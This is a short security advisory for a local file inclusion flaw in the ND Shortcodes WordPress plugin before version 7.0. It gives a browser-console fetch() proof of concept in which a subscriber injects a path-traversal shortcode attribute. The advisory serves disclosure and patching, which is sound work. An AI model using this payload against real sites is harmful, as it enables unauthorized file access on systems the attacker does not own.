ND Shortcodes < 7.0 - Subscriber+ LFI

The plugin does not validate some shortcode attributes before using them to generate paths passed to include function/s, allowing any authenticated users such as subscriber to perform LFI attacks

PoC

Run the below command in the developer console of the web browser while being on the blog as a subscriber user, this will include the index.php file of the root of the blog fetch(“/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “method”: “POST”, “body”: “action=parse-media-shortcode&shortcode;=[nd_options_testimonial nd_options_layout=‘…/…/…/…/…/…/index’]”, “credentials”: “include” }).then(response => response.text()) .then(data => console.log(data)); Numerous shortcodes were affected by this